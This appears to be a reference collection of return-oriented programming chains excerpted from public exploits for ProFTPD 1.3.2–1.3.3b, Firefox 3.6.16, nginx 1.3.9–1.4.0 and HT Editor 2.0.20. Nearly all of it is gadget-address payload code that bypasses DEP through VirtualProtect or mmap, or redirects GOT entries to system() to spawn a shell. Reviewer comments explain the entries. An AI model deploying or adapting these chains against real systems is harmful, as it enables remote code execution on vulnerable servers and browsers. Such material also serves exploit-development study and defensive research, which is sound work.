#ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
#https://www.rapid7.com/db/modules/exploit/linux/ftp/proftp_telnet_iac

#######################################################################################
0xcccccccc, # becomes ebp

0x8080f04,  # pop eax / ret
0x80db330,  # becomes eax (GOT of mmap64)

0x806a716,  # mov eax, [eax] / ret
0x805dd5c,  # jmp eax
0x80607b2,  # add esp, 0x24 / pop ebx / pop ebp / ret
# mmap args
0, 0x20000, 0x7, 0x22, 0xffffffff, 0,
0, # unused
0xcccccccc, # unused
0xcccccccc, # unused
0x100000000 - 0x5d5b24c4 + 0x80db3a4, # becomes ebx
0xcccccccc, # becomes ebp

# note, ebx gets fixed above :)
# 0xfe in 'ah' doesn't matter since we have more than enough space.
# now, load an instruction to store to eax
0x808b542,  # pop edx / mov ah, 0xfe / inc dword ptr [ebx+0x5d5b24c4] / ret
# becomes edx - mov [eax+ebp*4]; ebx / ret
"\x89\x1c\xa8\xc3".unpack('V').first,

# store it :)
0x805c2d0,  # mov [eax], edx / add esp, 0x10 / pop ebx / pop esi / pop ebp / ret
0xcccccccc, # unused
0xcccccccc, # unused
0xcccccccc, # unused
0xcccccccc, # unused
0xcccccccc, # becomes ebx
0xcccccccc, # becomes esi
0xcccccccc, # becomes ebp

# Copy the following stub:
#"\x8d\xb4\x24\x21\xfb\xff\xff" # lea esi, [esp-0x4df]
#"\x8d\x78\x12"  # lea edi, [eax+0x12]
#"\x6a\x7f"   # push 0x7f
#"\x59"     # pop ecx
#"\xf2\xa5"   # rep movsd

0x80607b5,  # pop ebx / pop ebp / ret
0xfb2124b4, # becomes ebx
1, # becomes ebp
0x805dd5c,  # jmp eax

0x80607b5,  # pop ebx / pop ebp / ret
0x788dffff, # becomes ebx
2, # becomes ebp
0x805dd5c,  # jmp eax

0x80607b5,  # pop ebx / pop ebp / ret
0x597f6a12, # becomes ebx
3, # becomes ebp
0x805dd5c,  # jmp eax

0x80607b5,  # pop ebx / pop ebp / ret
0x9090a5f2, # becomes ebx
4, # becomes ebp
0x805dd5c,  # jmp eax

0x80607b5,  # pop ebx / pop ebp / ret
0x8d909090, # becomes ebx
0, # becomes ebp
0x805dd5c,  # jmp eax

# hopefully we dont get here
0xcccccccc
#######################################################################################

#Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability
#https://www.rapid7.com/db/modules/exploit/windows/browser/mozilla_mchannel

# DEP bypass using xul.dll
# Ruby (Metasploit) fragment: every element is a 32-bit value and pack("V*")
# serialises them as little-endian dwords in exactly this order. The entry
# order is the whole logic of the chain, so nothing here may be reordered.
# `junk` is a filler value defined outside this excerpt.
# NOTE(review): all addresses are absolute (the xul.dll gadgets and the
# 0x7c801ad4 VirtualProtect pointer), so the chain only matches the specific
# non-relocated library builds the original module targeted; rebasing or ASLR
# of either library invalidates it.
rop_gadgets = [
  0x1052c871,  # mov esp,[ecx] / mov edx,5c86c6ff / add [eax],eax / xor eax,eax / pop esi / retn 0x8 [xul.dll]
  junk,        # junk --------------------------------------------------------------^^
  0x7c801ad4,  # VirtualProtect
  junk,        # junk -------------------------------------------------------------------------^^
  junk,        # junk -------------------------------------------------------------------------^^
  0x1003876B,  # jmp esp
  0x0c000040,  # start address
  0x00000400,  # size 1024
  0x00000040,  # Page EXECUTE_READ_WRITE
  0x0c0c0c00,  # old protection
].pack("V*")

#######################################################################################

#Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability
#https://www.rapid7.com/db/modules/exploit/windows/browser/mozilla_mchannel

# 5 gadgets to pivot using call oriented programming (cop)
# these instructions are taken from: java.dll, zip.dll and MSVCR71.dll (non aslr)
# 1. MOV EDX,DWORD PTR DS:[ECX] / junk / junk / junk / PUSH ECX / CALL [EDX+28C]
# 2. PUSH EAX / PUSH EBX / PUSH ESI / CALL [ECX+1C0]
# 3. PUSH EBP / MOV EBP,ESP / MOV EAX,[EBP+18] / PUSH 1C / PUSH 1 / PUSH [EAX+28] / CALL [EAX+20]
# 4. CALL [EAX+24] / POP ECX / POP ECX / RETN (neatly place address onto the stack)
# 5. ADD EAX,4 / TEST [EAX],EAX / XCHG EAX,ESP / MOV EAX,[EAX] / PUSH EAX / RETN

# rop_pivot is assembled in stages: the packed array below, then further
# packed dwords appended with <<. The gadget numbers in the comments refer to
# the five-gadget list above this snippet, not to position in the buffer
# (the buffer holds 1, 4, 5, then 3, then 2).
# Each `* N` repeats the 4-byte RETN gadget N times (a ROP-NOP sled);
# the (0xca-0x65) / (0x75+0x65) arithmetic in the trailing comments
# presumably documents how the sled lengths were derived -- verify against
# the original module before changing either count.
# `junk` is a filler value defined outside this excerpt.
# NOTE(review): all addresses are absolute, taken from java.dll, zip.dll and
# MSVCR71.dll, which the note above describes as non-ASLR builds.
rop_pivot = [
  0x6D32280C,  # 1. MOV EDX,DWORD PTR DS:[ECX] / junk / junk / junk / PUSH ECX / CALL [EDX+28C]
  junk,        # filler
  0x6D7E627D,  # 4. CALL [EAX+24] / POP ECX / POP ECX / RETN (neatly place address onto the stack)
  0x7C3413A4,  # 5. ADD EAX,4 / TEST [EAX],EAX / XCHG EAX,ESP / MOV EAX,[EAX] / PUSH EAX / RETN
].pack("V*")

# 319
# NOTE(review): the meaning of "319" is not recoverable from this excerpt.

# rop nops - RETN
rop_pivot << [0x7c3410c4].pack("V*") * 0x65 #(0xca-0x65)

# POP r32 / RETN
rop_pivot << [0x7c3410c3].pack("V*")

# 3. PUSH EBP / MOV EBP,ESP / MOV EAX,[EBP+18] / PUSH 1C / PUSH 1 / PUSH [EAX+28] / CALL [EAX+20]
rop_pivot << [0x6D7E5CDA].pack("V*")

# rop nops - RETN
rop_pivot << [0x7c3410c4].pack("V*") * 0xda # (0x75+0x65)

# POP r32 / RETN
rop_pivot << [0x7c3410c3].pack("V*")

# 2. PUSH EAX / PUSH EBX / PUSH ESI / CALL [ECX+1C0]
rop_pivot << [0x6D325BFC].pack("V*")

# https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ <MSVCR71.dll>
# The MSVCR71.dll VirtualProtect chain from the Corelan/mona.py write-up linked
# above; as with the other arrays on this page, pack("V*") emits the entries
# as little-endian dwords and their order is the logic.
# NOTE(review): this reassigns `rop_gadgets`, the same name the xul.dll chain
# earlier on this page uses; in one file the later assignment would silently
# replace the earlier one. Presumably the two come from different target
# branches of the original module -- keep them separate.
# The NEG EAX / NEG EDX steps turn 0xfffffdff into 0x201 (the size) and
# 0xffffffc0 into 0x40 (the EXECUTE_READWRITE page protection), presumably so
# that no NUL bytes appear in the packed chain -- verify against the write-up.
# `junk` is a filler value defined outside this excerpt.
rop_gadgets = [
  0x7c346c0a,  # POP EAX / RETN
  0x7c37a140,  # Make EAX readable
  0x7c37591f,  # PUSH ESP / ... / POP ECX / POP EBP / RETN
  junk,        # EBP (filler)
  0x7c346c0a,  # POP EAX / RETN
  0x7c37a140,  # *&VirtualProtect()
  0x7c3530ea,  # MOV EAX,[EAX] / RETN
  0x7c346c0b,  # Slide, so next gadget would write to correct stack location
  0x7c376069,  # MOV [ECX+1C],EAX / POP EDI / POP ESI / POP EBX / RETN
  junk,        # EDI (filler)
  junk,        # will be patched at runtime (VP), then picked up into ESI
  junk,        # EBX (filler)
  0x7c376402,  # POP EBP / RETN
  0x7c345c30,  # ptr to 'push esp /  ret'
  0x7c346c0a,  # POP EAX / RETN
  0xfffffdff,  # size 0x00000201 -> ebx
  0x7c351e05,  # NEG EAX / RETN
  0x7c354901,  # POP EBX / RETN
  0xffffffff,  # pop value into ebx
  0x7c345255,  # INC EBX / FPATAN / RETN
  0x7c352174,  # ADD EBX,EAX / XOR EAX,EAX / INC EAX / RETN
  0x7c34d201,  # POP ECX / RETN
  0x7c38b001,  # RW pointer (lpOldProtect) (-> ecx)
  0x7c34b8d7,  # POP EDI / RETN
  0x7c34b8d8,  # ROP NOP (-> edi)
  0x7c344f87,  # POP EDX / RETN
  0xffffffc0,  # value to negate, target value : 0x00000040, target: edx
  0x7c351eb1,  # NEG EDX / RETN
  0x7c346c0a,  # POP EAX / RETN
  0x90909090,  # NOPS (-> eax)
  0x7c378c81,  # PUSHAD / ADD AL,0EF / RETN
  0x90909090,  # NOPS (-> eax)
].pack("V*")
#######################################################################################

#Nginx HTTP Server 1.3.9-1.4.0
#https://www.exploit-db.com/exploits/25775

# First chain fragment of the exploit-db 25775 nginx / Ubuntu 13.04 PoC:
# five little-endian dwords that, run as a return chain, store one dword of
# `value` at `address`.
#
# address - Integer, the destination written by the final gadget
# value   - String, at least 4 bytes; only its first little-endian dword is
#           used (`unpack('V').first`), anything beyond that is ignored
#
# Returns the chain as a packed String ('V*').
#
# Note: the store gadget also writes edx to [address+4] (see its comment), so
# the dword following `address` is clobbered with whatever edx holds.
def store_ubuntu_1304(address, value)
  dword = value.unpack('V').first
  [
    0x0804c415, # pop ecx ; add al, 29h ; ret            -> ecx = address
    address,
    0x080b9a38, # pop eax ; ret                          -> eax = dword
    dword,
    0x080a9dce, # mov [ecx], eax ; mov [ecx+4], edx ; mov eax, 0 ; ret
  ].pack('V*')
end

# Second chain fragment of the exploit-db 25775 nginx / Ubuntu 13.04 PoC.
# Per the gadget comments: loads the GOT slot of localtime_r, adds the fixed
# offset 0x001a4b00 (annotated "Offset to system") to the value it holds, and
# transfers control to the result via push ecx / ret, leaving 0x41414141 as
# the return address and `target['Writable']` -- the .data location the
# previous chain stored its contents at -- as the argument.
#
# `target` is provided by the enclosing Metasploit module, not by this excerpt.
#
# Returns the chain as a packed String ('V*', little-endian dwords).
def dereference_got_ubuntu_1304
  gadgets = []
  gadgets << 0x08094129         # pop esi; ret
  gadgets << 0x080c5090         # GOT for localtime_r
  gadgets << 0x0804c415         # pop ecx ; add al, 29h ; ret
  gadgets << 0x001a4b00         # Offset to system
  gadgets << 0x080c360a         # add ecx, [esi] ; adc al, 41h ; ret
  gadgets << 0x08076f63         # push ecx ; add al, 39h ; ret
  gadgets << 0x41414141         # Garbage return address
  gadgets << target['Writable'] # ptr to .data where contents have been stored
  gadgets.pack('V*')
end
#######################################################################################

HT Editor 2.0.20 Buffer Overflow (ROP PoC)
https://www.exploit-db.com/exploits/22683

## Fry: This snow is beautiful. I'm glad global warming never happened.    ##
## Leela: Actually, it did. But thank God nuclear winter canceled it out.  ##
pack('V', 0x80b395e),           # pop %esi; ret;
pack('V', 0x81bd518),           # endwin@GOT
pack('V', 0x80b5903),           # mov %esi, %eax; pop pop pop ret;
pack('V', 0xb00b4dad) x 3,      # JUNK
pack('V', 0x813527b),           # mov (%eax), %eax; add $0x1c, %esp; ret;
pack('V', 0xabadf00d) x 7,      # JUNK
pack('V', 0x813589b),           # call *%eax;

##      Amy, technology isn't intrinsically good or evil, it's how it's used, like the Death Ray. ##
pack('V', 0x80b395e),           # pop %esi; ret;
pack('V', 0x81bd3fc),           # __cxa_atexit@GOT - 4 // base address whose pointer will help locating system().
pack('V', 0x80b5903),           # mov %esi, %eax; pop pop pop ret;
pack('V', 0xdeadbeef) x 3,      # JUNK
pack('V', 0x80c21e6),           # add %eax, $0x4; ret; // Beat my 8 bit metal ass.
pack('V', 0x813527b),           # mov (%eax), %eax; add $0x1c, %esp; ret; // In the game of chess, you can never let your adversary see your pieces.
pack('V', 0xdeafface) x 7,      # JUNK
pack('V', 0x80b395e),           # pop %esi; ret;
pack('V', 0x292ceaab),          # A number to get the right 
pack('V', 0x80512a6),           # add %esi, %eax; pop pop pop ret;
pack('V', 0xc0b4beef) x 3,      # JUNK
pack('V', 0x80d4612),           # sub eax, 0x292c4e8b ; ret; // I'm not sure. I'm afraid we need to use... MATH.
pack('V', 0x813589b),           # call *%eax;
pack('V', 0x804aa10),           # exit@plt
pack('V', 0x816928f),           # 'sh' string

#######################################################################################


MOV is Turing-complete
https://drwho.virtadpt.net/files/mov.pdf

